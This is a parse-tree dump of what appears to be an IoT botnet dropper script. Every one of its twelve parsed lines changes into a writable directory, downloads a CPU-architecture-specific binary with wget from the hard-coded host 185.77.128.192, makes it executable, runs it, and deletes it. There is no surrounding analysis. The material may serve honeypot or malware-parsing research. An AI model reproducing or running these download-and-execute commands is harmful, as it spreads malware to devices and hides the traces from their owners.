ListNode(lineno=2, pos=(12, 153), parts=[
  CommandNode(lineno=2, pos=(12, 19), parts=[
    WordNode(lineno=2, pos=(12, 14), word='cd'),
    WordNode(lineno=2, pos=(15, 19), word='/tmp'),
  ]),
  OperatorNode(lineno=2, op='||', pos=(20, 22)),
  CommandNode(lineno=2, pos=(23, 37), parts=[
    WordNode(lineno=2, pos=(23, 25), word='cd'),
    WordNode(lineno=2, pos=(26, 37), word='/var/system'),
  ]),
  OperatorNode(lineno=2, op='||', pos=(38, 40)),
  CommandNode(lineno=2, pos=(41, 48), parts=[
    WordNode(lineno=2, pos=(41, 43), word='cd'),
    WordNode(lineno=2, pos=(44, 48), word='/mnt'),
  ]),
  OperatorNode(lineno=2, op='||', pos=(49, 51)),
  CommandNode(lineno=2, pos=(52, 60), parts=[
    WordNode(lineno=2, pos=(52, 54), word='cd'),
    WordNode(lineno=2, pos=(55, 60), word='/root'),
  ]),
  OperatorNode(lineno=2, op='||', pos=(61, 63)),
  CommandNode(lineno=2, pos=(64, 68), parts=[
    WordNode(lineno=2, pos=(64, 66), word='cd'),
    WordNode(lineno=2, pos=(67, 68), word='/'),
  ]),
  OperatorNode(lineno=2, op=';', pos=(68, 69)),
  CommandNode(lineno=2, pos=(70, 105), parts=[
    WordNode(lineno=2, pos=(70, 74), word='wget'),
    WordNode(lineno=2, pos=(75, 105), word='http://185.77.128.192/iluvmips'),
  ]),
  OperatorNode(lineno=2, op=';', pos=(105, 106)),
  CommandNode(lineno=2, pos=(107, 124), parts=[
    WordNode(lineno=2, pos=(107, 112), word='chmod'),
    WordNode(lineno=2, pos=(113, 115), word='+x'),
    WordNode(lineno=2, pos=(116, 124), word='iluvmips'),
  ]),
  OperatorNode(lineno=2, op=';', pos=(124, 125)),
  CommandNode(lineno=2, pos=(126, 136), parts=[
    WordNode(lineno=2, pos=(126, 136), word='./iluvmips'),
  ]),
  OperatorNode(lineno=2, op=';', pos=(136, 137)),
  CommandNode(lineno=2, pos=(138, 153), parts=[
    WordNode(lineno=2, pos=(138, 140), word='rm'),
    WordNode(lineno=2, pos=(141, 144), word='-rf'),
    WordNode(lineno=2, pos=(145, 153), word='iluvmips'),
  ]),
])
ListNode(lineno=3, pos=(154, 303), parts=[
  CommandNode(lineno=3, pos=(154, 161), parts=[
    WordNode(lineno=3, pos=(154, 156), word='cd'),
    WordNode(lineno=3, pos=(157, 161), word='/tmp'),
  ]),
  OperatorNode(lineno=3, op='||', pos=(162, 164)),
  CommandNode(lineno=3, pos=(165, 179), parts=[
    WordNode(lineno=3, pos=(165, 167), word='cd'),
    WordNode(lineno=3, pos=(168, 179), word='/var/system'),
  ]),
  OperatorNode(lineno=3, op='||', pos=(180, 182)),
  CommandNode(lineno=3, pos=(183, 190), parts=[
    WordNode(lineno=3, pos=(183, 185), word='cd'),
    WordNode(lineno=3, pos=(186, 190), word='/mnt'),
  ]),
  OperatorNode(lineno=3, op='||', pos=(191, 193)),
  CommandNode(lineno=3, pos=(194, 202), parts=[
    WordNode(lineno=3, pos=(194, 196), word='cd'),
    WordNode(lineno=3, pos=(197, 202), word='/root'),
  ]),
  OperatorNode(lineno=3, op='||', pos=(203, 205)),
  CommandNode(lineno=3, pos=(206, 210), parts=[
    WordNode(lineno=3, pos=(206, 208), word='cd'),
    WordNode(lineno=3, pos=(209, 210), word='/'),
  ]),
  OperatorNode(lineno=3, op=';', pos=(210, 211)),
  CommandNode(lineno=3, pos=(212, 249), parts=[
    WordNode(lineno=3, pos=(212, 216), word='wget'),
    WordNode(lineno=3, pos=(217, 249), word='http://185.77.128.192/dannytyzoh'),
  ]),
  OperatorNode(lineno=3, op=';', pos=(249, 250)),
  CommandNode(lineno=3, pos=(251, 270), parts=[
    WordNode(lineno=3, pos=(251, 256), word='chmod'),
    WordNode(lineno=3, pos=(257, 259), word='+x'),
    WordNode(lineno=3, pos=(260, 270), word='dannytyzoh'),
  ]),
  OperatorNode(lineno=3, op=';', pos=(270, 271)),
  CommandNode(lineno=3, pos=(272, 284), parts=[
    WordNode(lineno=3, pos=(272, 284), word='./dannytyzoh'),
  ]),
  OperatorNode(lineno=3, op=';', pos=(284, 285)),
  CommandNode(lineno=3, pos=(286, 303), parts=[
    WordNode(lineno=3, pos=(286, 288), word='rm'),
    WordNode(lineno=3, pos=(289, 292), word='-rf'),
    WordNode(lineno=3, pos=(293, 303), word='dannytyzoh'),
  ]),
])
ListNode(lineno=4, pos=(304, 449), parts=[
  CommandNode(lineno=4, pos=(304, 311), parts=[
    WordNode(lineno=4, pos=(304, 306), word='cd'),
    WordNode(lineno=4, pos=(307, 311), word='/tmp'),
  ]),
  OperatorNode(lineno=4, op='||', pos=(312, 314)),
  CommandNode(lineno=4, pos=(315, 329), parts=[
    WordNode(lineno=4, pos=(315, 317), word='cd'),
    WordNode(lineno=4, pos=(318, 329), word='/var/system'),
  ]),
  OperatorNode(lineno=4, op='||', pos=(330, 332)),
  CommandNode(lineno=4, pos=(333, 340), parts=[
    WordNode(lineno=4, pos=(333, 335), word='cd'),
    WordNode(lineno=4, pos=(336, 340), word='/mnt'),
  ]),
  OperatorNode(lineno=4, op='||', pos=(341, 343)),
  CommandNode(lineno=4, pos=(344, 352), parts=[
    WordNode(lineno=4, pos=(344, 346), word='cd'),
    WordNode(lineno=4, pos=(347, 352), word='/root'),
  ]),
  OperatorNode(lineno=4, op='||', pos=(353, 355)),
  CommandNode(lineno=4, pos=(356, 360), parts=[
    WordNode(lineno=4, pos=(356, 358), word='cd'),
    WordNode(lineno=4, pos=(359, 360), word='/'),
  ]),
  OperatorNode(lineno=4, op=';', pos=(360, 361)),
  CommandNode(lineno=4, pos=(362, 398), parts=[
    WordNode(lineno=4, pos=(362, 366), word='wget'),
    WordNode(lineno=4, pos=(367, 398), word='http://185.77.128.192/igisamzin'),
  ]),
  OperatorNode(lineno=4, op=';', pos=(398, 399)),
  CommandNode(lineno=4, pos=(400, 418), parts=[
    WordNode(lineno=4, pos=(400, 405), word='chmod'),
    WordNode(lineno=4, pos=(406, 408), word='+x'),
    WordNode(lineno=4, pos=(409, 418), word='igisamzin'),
  ]),
  OperatorNode(lineno=4, op=';', pos=(418, 419)),
  CommandNode(lineno=4, pos=(420, 431), parts=[
    WordNode(lineno=4, pos=(420, 431), word='./igisamzin'),
  ]),
  OperatorNode(lineno=4, op=';', pos=(431, 432)),
  CommandNode(lineno=4, pos=(433, 449), parts=[
    WordNode(lineno=4, pos=(433, 435), word='rm'),
    WordNode(lineno=4, pos=(436, 439), word='-rf'),
    WordNode(lineno=4, pos=(440, 449), word='igisamzin'),
  ]),
])
ListNode(lineno=5, pos=(450, 615), parts=[
  CommandNode(lineno=5, pos=(450, 457), parts=[
    WordNode(lineno=5, pos=(450, 452), word='cd'),
    WordNode(lineno=5, pos=(453, 457), word='/tmp'),
  ]),
  OperatorNode(lineno=5, op='||', pos=(458, 460)),
  CommandNode(lineno=5, pos=(461, 475), parts=[
    WordNode(lineno=5, pos=(461, 463), word='cd'),
    WordNode(lineno=5, pos=(464, 475), word='/var/system'),
  ]),
  OperatorNode(lineno=5, op='||', pos=(476, 478)),
  CommandNode(lineno=5, pos=(479, 486), parts=[
    WordNode(lineno=5, pos=(479, 481), word='cd'),
    WordNode(lineno=5, pos=(482, 486), word='/mnt'),
  ]),
  OperatorNode(lineno=5, op='||', pos=(487, 489)),
  CommandNode(lineno=5, pos=(490, 498), parts=[
    WordNode(lineno=5, pos=(490, 492), word='cd'),
    WordNode(lineno=5, pos=(493, 498), word='/root'),
  ]),
  OperatorNode(lineno=5, op='||', pos=(499, 501)),
  CommandNode(lineno=5, pos=(502, 506), parts=[
    WordNode(lineno=5, pos=(502, 504), word='cd'),
    WordNode(lineno=5, pos=(505, 506), word='/'),
  ]),
  OperatorNode(lineno=5, op=';', pos=(506, 507)),
  CommandNode(lineno=5, pos=(508, 549), parts=[
    WordNode(lineno=5, pos=(508, 512), word='wget'),
    WordNode(lineno=5, pos=(513, 549), word='http://185.77.128.192/Ihaveablackpup'),
  ]),
  OperatorNode(lineno=5, op=';', pos=(549, 550)),
  CommandNode(lineno=5, pos=(551, 574), parts=[
    WordNode(lineno=5, pos=(551, 556), word='chmod'),
    WordNode(lineno=5, pos=(557, 559), word='+x'),
    WordNode(lineno=5, pos=(560, 574), word='Ihaveablackpup'),
  ]),
  OperatorNode(lineno=5, op=';', pos=(574, 575)),
  CommandNode(lineno=5, pos=(576, 592), parts=[
    WordNode(lineno=5, pos=(576, 592), word='./Ihaveablackpup'),
  ]),
  OperatorNode(lineno=5, op=';', pos=(592, 593)),
  CommandNode(lineno=5, pos=(594, 615), parts=[
    WordNode(lineno=5, pos=(594, 596), word='rm'),
    WordNode(lineno=5, pos=(597, 600), word='-rf'),
    WordNode(lineno=5, pos=(601, 615), word='Ihaveablackpup'),
  ]),
])
ListNode(lineno=6, pos=(616, 761), parts=[
  CommandNode(lineno=6, pos=(616, 623), parts=[
    WordNode(lineno=6, pos=(616, 618), word='cd'),
    WordNode(lineno=6, pos=(619, 623), word='/tmp'),
  ]),
  OperatorNode(lineno=6, op='||', pos=(624, 626)),
  CommandNode(lineno=6, pos=(627, 641), parts=[
    WordNode(lineno=6, pos=(627, 629), word='cd'),
    WordNode(lineno=6, pos=(630, 641), word='/var/system'),
  ]),
  OperatorNode(lineno=6, op='||', pos=(642, 644)),
  CommandNode(lineno=6, pos=(645, 652), parts=[
    WordNode(lineno=6, pos=(645, 647), word='cd'),
    WordNode(lineno=6, pos=(648, 652), word='/mnt'),
  ]),
  OperatorNode(lineno=6, op='||', pos=(653, 655)),
  CommandNode(lineno=6, pos=(656, 664), parts=[
    WordNode(lineno=6, pos=(656, 658), word='cd'),
    WordNode(lineno=6, pos=(659, 664), word='/root'),
  ]),
  OperatorNode(lineno=6, op='||', pos=(665, 667)),
  CommandNode(lineno=6, pos=(668, 672), parts=[
    WordNode(lineno=6, pos=(668, 670), word='cd'),
    WordNode(lineno=6, pos=(671, 672), word='/'),
  ]),
  OperatorNode(lineno=6, op=';', pos=(672, 673)),
  CommandNode(lineno=6, pos=(674, 710), parts=[
    WordNode(lineno=6, pos=(674, 678), word='wget'),
    WordNode(lineno=6, pos=(679, 710), word='http://185.77.128.192/Armv4lkek'),
  ]),
  OperatorNode(lineno=6, op=';', pos=(710, 711)),
  CommandNode(lineno=6, pos=(712, 730), parts=[
    WordNode(lineno=6, pos=(712, 717), word='chmod'),
    WordNode(lineno=6, pos=(718, 720), word='+x'),
    WordNode(lineno=6, pos=(721, 730), word='Armv4lkek'),
  ]),
  OperatorNode(lineno=6, op=';', pos=(730, 731)),
  CommandNode(lineno=6, pos=(732, 743), parts=[
    WordNode(lineno=6, pos=(732, 743), word='./Armv4lkek'),
  ]),
  OperatorNode(lineno=6, op=';', pos=(743, 744)),
  CommandNode(lineno=6, pos=(745, 761), parts=[
    WordNode(lineno=6, pos=(745, 747), word='rm'),
    WordNode(lineno=6, pos=(748, 751), word='-rf'),
    WordNode(lineno=6, pos=(752, 761), word='Armv4lkek'),
  ]),
])
ListNode(lineno=7, pos=(762, 907), parts=[
  CommandNode(lineno=7, pos=(762, 769), parts=[
    WordNode(lineno=7, pos=(762, 764), word='cd'),
    WordNode(lineno=7, pos=(765, 769), word='/tmp'),
  ]),
  OperatorNode(lineno=7, op='||', pos=(770, 772)),
  CommandNode(lineno=7, pos=(773, 787), parts=[
    WordNode(lineno=7, pos=(773, 775), word='cd'),
    WordNode(lineno=7, pos=(776, 787), word='/var/system'),
  ]),
  OperatorNode(lineno=7, op='||', pos=(788, 790)),
  CommandNode(lineno=7, pos=(791, 798), parts=[
    WordNode(lineno=7, pos=(791, 793), word='cd'),
    WordNode(lineno=7, pos=(794, 798), word='/mnt'),
  ]),
  OperatorNode(lineno=7, op='||', pos=(799, 801)),
  CommandNode(lineno=7, pos=(802, 810), parts=[
    WordNode(lineno=7, pos=(802, 804), word='cd'),
    WordNode(lineno=7, pos=(805, 810), word='/root'),
  ]),
  OperatorNode(lineno=7, op='||', pos=(811, 813)),
  CommandNode(lineno=7, pos=(814, 818), parts=[
    WordNode(lineno=7, pos=(814, 816), word='cd'),
    WordNode(lineno=7, pos=(817, 818), word='/'),
  ]),
  OperatorNode(lineno=7, op=';', pos=(818, 819)),
  CommandNode(lineno=7, pos=(820, 856), parts=[
    WordNode(lineno=7, pos=(820, 824), word='wget'),
    WordNode(lineno=7, pos=(825, 856), word='http://185.77.128.192/Armv5lkek'),
  ]),
  OperatorNode(lineno=7, op=';', pos=(856, 857)),
  CommandNode(lineno=7, pos=(858, 876), parts=[
    WordNode(lineno=7, pos=(858, 863), word='chmod'),
    WordNode(lineno=7, pos=(864, 866), word='+x'),
    WordNode(lineno=7, pos=(867, 876), word='Armv5lkek'),
  ]),
  OperatorNode(lineno=7, op=';', pos=(876, 877)),
  CommandNode(lineno=7, pos=(878, 889), parts=[
    WordNode(lineno=7, pos=(878, 889), word='./Armv5lkek'),
  ]),
  OperatorNode(lineno=7, op=';', pos=(889, 890)),
  CommandNode(lineno=7, pos=(891, 907), parts=[
    WordNode(lineno=7, pos=(891, 893), word='rm'),
    WordNode(lineno=7, pos=(894, 897), word='-rf'),
    WordNode(lineno=7, pos=(898, 907), word='Armv5lkek'),
  ]),
])
ListNode(lineno=8, pos=(908, 1053), parts=[
  CommandNode(lineno=8, pos=(908, 915), parts=[
    WordNode(lineno=8, pos=(908, 910), word='cd'),
    WordNode(lineno=8, pos=(911, 915), word='/tmp'),
  ]),
  OperatorNode(lineno=8, op='||', pos=(916, 918)),
  CommandNode(lineno=8, pos=(919, 933), parts=[
    WordNode(lineno=8, pos=(919, 921), word='cd'),
    WordNode(lineno=8, pos=(922, 933), word='/var/system'),
  ]),
  OperatorNode(lineno=8, op='||', pos=(934, 936)),
  CommandNode(lineno=8, pos=(937, 944), parts=[
    WordNode(lineno=8, pos=(937, 939), word='cd'),
    WordNode(lineno=8, pos=(940, 944), word='/mnt'),
  ]),
  OperatorNode(lineno=8, op='||', pos=(945, 947)),
  CommandNode(lineno=8, pos=(948, 956), parts=[
    WordNode(lineno=8, pos=(948, 950), word='cd'),
    WordNode(lineno=8, pos=(951, 956), word='/root'),
  ]),
  OperatorNode(lineno=8, op='||', pos=(957, 959)),
  CommandNode(lineno=8, pos=(960, 964), parts=[
    WordNode(lineno=8, pos=(960, 962), word='cd'),
    WordNode(lineno=8, pos=(963, 964), word='/'),
  ]),
  OperatorNode(lineno=8, op=';', pos=(964, 965)),
  CommandNode(lineno=8, pos=(966, 1002), parts=[
    WordNode(lineno=8, pos=(966, 970), word='wget'),
    WordNode(lineno=8, pos=(971, 1002), word='http://185.77.128.192/Armv6lkek'),
  ]),
  OperatorNode(lineno=8, op=';', pos=(1002, 1003)),
  CommandNode(lineno=8, pos=(1004, 1022), parts=[
    WordNode(lineno=8, pos=(1004, 1009), word='chmod'),
    WordNode(lineno=8, pos=(1010, 1012), word='+x'),
    WordNode(lineno=8, pos=(1013, 1022), word='Armv6lkek'),
  ]),
  OperatorNode(lineno=8, op=';', pos=(1022, 1023)),
  CommandNode(lineno=8, pos=(1024, 1035), parts=[
    WordNode(lineno=8, pos=(1024, 1035), word='./Armv6lkek'),
  ]),
  OperatorNode(lineno=8, op=';', pos=(1035, 1036)),
  CommandNode(lineno=8, pos=(1037, 1053), parts=[
    WordNode(lineno=8, pos=(1037, 1039), word='rm'),
    WordNode(lineno=8, pos=(1040, 1043), word='-rf'),
    WordNode(lineno=8, pos=(1044, 1053), word='Armv6lkek'),
  ]),
])
ListNode(lineno=9, pos=(1054, 1191), parts=[
  CommandNode(lineno=9, pos=(1054, 1061), parts=[
    WordNode(lineno=9, pos=(1054, 1056), word='cd'),
    WordNode(lineno=9, pos=(1057, 1061), word='/tmp'),
  ]),
  OperatorNode(lineno=9, op='||', pos=(1062, 1064)),
  CommandNode(lineno=9, pos=(1065, 1079), parts=[
    WordNode(lineno=9, pos=(1065, 1067), word='cd'),
    WordNode(lineno=9, pos=(1068, 1079), word='/var/system'),
  ]),
  OperatorNode(lineno=9, op='||', pos=(1080, 1082)),
  CommandNode(lineno=9, pos=(1083, 1090), parts=[
    WordNode(lineno=9, pos=(1083, 1085), word='cd'),
    WordNode(lineno=9, pos=(1086, 1090), word='/mnt'),
  ]),
  OperatorNode(lineno=9, op='||', pos=(1091, 1093)),
  CommandNode(lineno=9, pos=(1094, 1102), parts=[
    WordNode(lineno=9, pos=(1094, 1096), word='cd'),
    WordNode(lineno=9, pos=(1097, 1102), word='/root'),
  ]),
  OperatorNode(lineno=9, op='||', pos=(1103, 1105)),
  CommandNode(lineno=9, pos=(1106, 1110), parts=[
    WordNode(lineno=9, pos=(1106, 1108), word='cd'),
    WordNode(lineno=9, pos=(1109, 1110), word='/'),
  ]),
  OperatorNode(lineno=9, op=';', pos=(1110, 1111)),
  CommandNode(lineno=9, pos=(1112, 1146), parts=[
    WordNode(lineno=9, pos=(1112, 1116), word='wget'),
    WordNode(lineno=9, pos=(1117, 1146), word='http://185.77.128.192/i686kek'),
  ]),
  OperatorNode(lineno=9, op=';', pos=(1146, 1147)),
  CommandNode(lineno=9, pos=(1148, 1164), parts=[
    WordNode(lineno=9, pos=(1148, 1153), word='chmod'),
    WordNode(lineno=9, pos=(1154, 1156), word='+x'),
    WordNode(lineno=9, pos=(1157, 1164), word='i686kek'),
  ]),
  OperatorNode(lineno=9, op=';', pos=(1164, 1165)),
  CommandNode(lineno=9, pos=(1166, 1175), parts=[
    WordNode(lineno=9, pos=(1166, 1175), word='./i686kek'),
  ]),
  OperatorNode(lineno=9, op=';', pos=(1175, 1176)),
  CommandNode(lineno=9, pos=(1177, 1191), parts=[
    WordNode(lineno=9, pos=(1177, 1179), word='rm'),
    WordNode(lineno=9, pos=(1180, 1183), word='-rf'),
    WordNode(lineno=9, pos=(1184, 1191), word='i686kek'),
  ]),
])
ListNode(lineno=10, pos=(1192, 1325), parts=[
  CommandNode(lineno=10, pos=(1192, 1199), parts=[
    WordNode(lineno=10, pos=(1192, 1194), word='cd'),
    WordNode(lineno=10, pos=(1195, 1199), word='/tmp'),
  ]),
  OperatorNode(lineno=10, op='||', pos=(1200, 1202)),
  CommandNode(lineno=10, pos=(1203, 1217), parts=[
    WordNode(lineno=10, pos=(1203, 1205), word='cd'),
    WordNode(lineno=10, pos=(1206, 1217), word='/var/system'),
  ]),
  OperatorNode(lineno=10, op='||', pos=(1218, 1220)),
  CommandNode(lineno=10, pos=(1221, 1228), parts=[
    WordNode(lineno=10, pos=(1221, 1223), word='cd'),
    WordNode(lineno=10, pos=(1224, 1228), word='/mnt'),
  ]),
  OperatorNode(lineno=10, op='||', pos=(1229, 1231)),
  CommandNode(lineno=10, pos=(1232, 1240), parts=[
    WordNode(lineno=10, pos=(1232, 1234), word='cd'),
    WordNode(lineno=10, pos=(1235, 1240), word='/root'),
  ]),
  OperatorNode(lineno=10, op='||', pos=(1241, 1243)),
  CommandNode(lineno=10, pos=(1244, 1248), parts=[
    WordNode(lineno=10, pos=(1244, 1246), word='cd'),
    WordNode(lineno=10, pos=(1247, 1248), word='/'),
  ]),
  OperatorNode(lineno=10, op=';', pos=(1248, 1249)),
  CommandNode(lineno=10, pos=(1250, 1283), parts=[
    WordNode(lineno=10, pos=(1250, 1254), word='wget'),
    WordNode(lineno=10, pos=(1255, 1283), word='http://185.77.128.192/ppckek'),
  ]),
  OperatorNode(lineno=10, op=';', pos=(1283, 1284)),
  CommandNode(lineno=10, pos=(1285, 1300), parts=[
    WordNode(lineno=10, pos=(1285, 1290), word='chmod'),
    WordNode(lineno=10, pos=(1291, 1293), word='+x'),
    WordNode(lineno=10, pos=(1294, 1300), word='ppckek'),
  ]),
  OperatorNode(lineno=10, op=';', pos=(1300, 1301)),
  CommandNode(lineno=10, pos=(1302, 1310), parts=[
    WordNode(lineno=10, pos=(1302, 1310), word='./ppckek'),
  ]),
  OperatorNode(lineno=10, op=';', pos=(1310, 1311)),
  CommandNode(lineno=10, pos=(1312, 1325), parts=[
    WordNode(lineno=10, pos=(1312, 1314), word='rm'),
    WordNode(lineno=10, pos=(1315, 1318), word='-rf'),
    WordNode(lineno=10, pos=(1319, 1325), word='ppckek'),
  ]),
])
ListNode(lineno=11, pos=(1326, 1475), parts=[
  CommandNode(lineno=11, pos=(1326, 1333), parts=[
    WordNode(lineno=11, pos=(1326, 1328), word='cd'),
    WordNode(lineno=11, pos=(1329, 1333), word='/tmp'),
  ]),
  OperatorNode(lineno=11, op='||', pos=(1334, 1336)),
  CommandNode(lineno=11, pos=(1337, 1351), parts=[
    WordNode(lineno=11, pos=(1337, 1339), word='cd'),
    WordNode(lineno=11, pos=(1340, 1351), word='/var/system'),
  ]),
  OperatorNode(lineno=11, op='||', pos=(1352, 1354)),
  CommandNode(lineno=11, pos=(1355, 1362), parts=[
    WordNode(lineno=11, pos=(1355, 1357), word='cd'),
    WordNode(lineno=11, pos=(1358, 1362), word='/mnt'),
  ]),
  OperatorNode(lineno=11, op='||', pos=(1363, 1365)),
  CommandNode(lineno=11, pos=(1366, 1374), parts=[
    WordNode(lineno=11, pos=(1366, 1368), word='cd'),
    WordNode(lineno=11, pos=(1369, 1374), word='/root'),
  ]),
  OperatorNode(lineno=11, op='||', pos=(1375, 1377)),
  CommandNode(lineno=11, pos=(1378, 1382), parts=[
    WordNode(lineno=11, pos=(1378, 1380), word='cd'),
    WordNode(lineno=11, pos=(1381, 1382), word='/'),
  ]),
  OperatorNode(lineno=11, op=';', pos=(1382, 1383)),
  CommandNode(lineno=11, pos=(1384, 1421), parts=[
    WordNode(lineno=11, pos=(1384, 1388), word='wget'),
    WordNode(lineno=11, pos=(1389, 1421), word='http://185.77.128.192/motorcycle'),
  ]),
  OperatorNode(lineno=11, op=';', pos=(1421, 1422)),
  CommandNode(lineno=11, pos=(1423, 1442), parts=[
    WordNode(lineno=11, pos=(1423, 1428), word='chmod'),
    WordNode(lineno=11, pos=(1429, 1431), word='+x'),
    WordNode(lineno=11, pos=(1432, 1442), word='motorcycle'),
  ]),
  OperatorNode(lineno=11, op=';', pos=(1442, 1443)),
  CommandNode(lineno=11, pos=(1444, 1456), parts=[
    WordNode(lineno=11, pos=(1444, 1456), word='./motorcycle'),
  ]),
  OperatorNode(lineno=11, op=';', pos=(1456, 1457)),
  CommandNode(lineno=11, pos=(1458, 1475), parts=[
    WordNode(lineno=11, pos=(1458, 1460), word='rm'),
    WordNode(lineno=11, pos=(1461, 1464), word='-rf'),
    WordNode(lineno=11, pos=(1465, 1475), word='motorcycle'),
  ]),
])
ListNode(lineno=12, pos=(1476, 1609), parts=[
  CommandNode(lineno=12, pos=(1476, 1483), parts=[
    WordNode(lineno=12, pos=(1476, 1478), word='cd'),
    WordNode(lineno=12, pos=(1479, 1483), word='/tmp'),
  ]),
  OperatorNode(lineno=12, op='||', pos=(1484, 1486)),
  CommandNode(lineno=12, pos=(1487, 1501), parts=[
    WordNode(lineno=12, pos=(1487, 1489), word='cd'),
    WordNode(lineno=12, pos=(1490, 1501), word='/var/system'),
  ]),
  OperatorNode(lineno=12, op='||', pos=(1502, 1504)),
  CommandNode(lineno=12, pos=(1505, 1512), parts=[
    WordNode(lineno=12, pos=(1505, 1507), word='cd'),
    WordNode(lineno=12, pos=(1508, 1512), word='/mnt'),
  ]),
  OperatorNode(lineno=12, op='||', pos=(1513, 1515)),
  CommandNode(lineno=12, pos=(1516, 1524), parts=[
    WordNode(lineno=12, pos=(1516, 1518), word='cd'),
    WordNode(lineno=12, pos=(1519, 1524), word='/root'),
  ]),
  OperatorNode(lineno=12, op='||', pos=(1525, 1527)),
  CommandNode(lineno=12, pos=(1528, 1532), parts=[
    WordNode(lineno=12, pos=(1528, 1530), word='cd'),
    WordNode(lineno=12, pos=(1531, 1532), word='/'),
  ]),
  OperatorNode(lineno=12, op=';', pos=(1532, 1533)),
  CommandNode(lineno=12, pos=(1534, 1567), parts=[
    WordNode(lineno=12, pos=(1534, 1538), word='wget'),
    WordNode(lineno=12, pos=(1539, 1567), word='http://185.77.128.192/m68kek'),
  ]),
  OperatorNode(lineno=12, op=';', pos=(1567, 1568)),
  CommandNode(lineno=12, pos=(1569, 1584), parts=[
    WordNode(lineno=12, pos=(1569, 1574), word='chmod'),
    WordNode(lineno=12, pos=(1575, 1577), word='+x'),
    WordNode(lineno=12, pos=(1578, 1584), word='m68kek'),
  ]),
  OperatorNode(lineno=12, op=';', pos=(1584, 1585)),
  CommandNode(lineno=12, pos=(1586, 1594), parts=[
    WordNode(lineno=12, pos=(1586, 1594), word='./m68kek'),
  ]),
  OperatorNode(lineno=12, op=';', pos=(1594, 1595)),
  CommandNode(lineno=12, pos=(1596, 1609), parts=[
    WordNode(lineno=12, pos=(1596, 1598), word='rm'),
    WordNode(lineno=12, pos=(1599, 1602), word='-rf'),
    WordNode(lineno=12, pos=(1603, 1609), word='m68kek'),
  ]),
])
ListNode(lineno=13, pos=(1610, 1751), parts=[
  CommandNode(lineno=13, pos=(1610, 1617), parts=[
    WordNode(lineno=13, pos=(1610, 1612), word='cd'),
    WordNode(lineno=13, pos=(1613, 1617), word='/tmp'),
  ]),
  OperatorNode(lineno=13, op='||', pos=(1618, 1620)),
  CommandNode(lineno=13, pos=(1621, 1635), parts=[
    WordNode(lineno=13, pos=(1621, 1623), word='cd'),
    WordNode(lineno=13, pos=(1624, 1635), word='/var/system'),
  ]),
  OperatorNode(lineno=13, op='||', pos=(1636, 1638)),
  CommandNode(lineno=13, pos=(1639, 1646), parts=[
    WordNode(lineno=13, pos=(1639, 1641), word='cd'),
    WordNode(lineno=13, pos=(1642, 1646), word='/mnt'),
  ]),
  OperatorNode(lineno=13, op='||', pos=(1647, 1649)),
  CommandNode(lineno=13, pos=(1650, 1658), parts=[
    WordNode(lineno=13, pos=(1650, 1652), word='cd'),
    WordNode(lineno=13, pos=(1653, 1658), word='/root'),
  ]),
  OperatorNode(lineno=13, op='||', pos=(1659, 1661)),
  CommandNode(lineno=13, pos=(1662, 1666), parts=[
    WordNode(lineno=13, pos=(1662, 1664), word='cd'),
    WordNode(lineno=13, pos=(1665, 1666), word='/'),
  ]),
  OperatorNode(lineno=13, op=';', pos=(1666, 1667)),
  CommandNode(lineno=13, pos=(1668, 1703), parts=[
    WordNode(lineno=13, pos=(1668, 1672), word='wget'),
    WordNode(lineno=13, pos=(1673, 1703), word='http://185.77.128.192/sparckek'),
  ]),
  OperatorNode(lineno=13, op=';', pos=(1703, 1704)),
  CommandNode(lineno=13, pos=(1705, 1722), parts=[
    WordNode(lineno=13, pos=(1705, 1710), word='chmod'),
    WordNode(lineno=13, pos=(1711, 1713), word='+x'),
    WordNode(lineno=13, pos=(1714, 1722), word='sparckek'),
  ]),
  OperatorNode(lineno=13, op=';', pos=(1722, 1723)),
  CommandNode(lineno=13, pos=(1724, 1734), parts=[
    WordNode(lineno=13, pos=(1724, 1734), word='./sparckek'),
  ]),
  OperatorNode(lineno=13, op=';', pos=(1734, 1735)),
  CommandNode(lineno=13, pos=(1736, 1751), parts=[
    WordNode(lineno=13, pos=(1736, 1738), word='rm'),
    WordNode(lineno=13, pos=(1739, 1742), word='-rf'),
    WordNode(lineno=13, pos=(1743, 1751), word='sparckek'),
  ]),
])
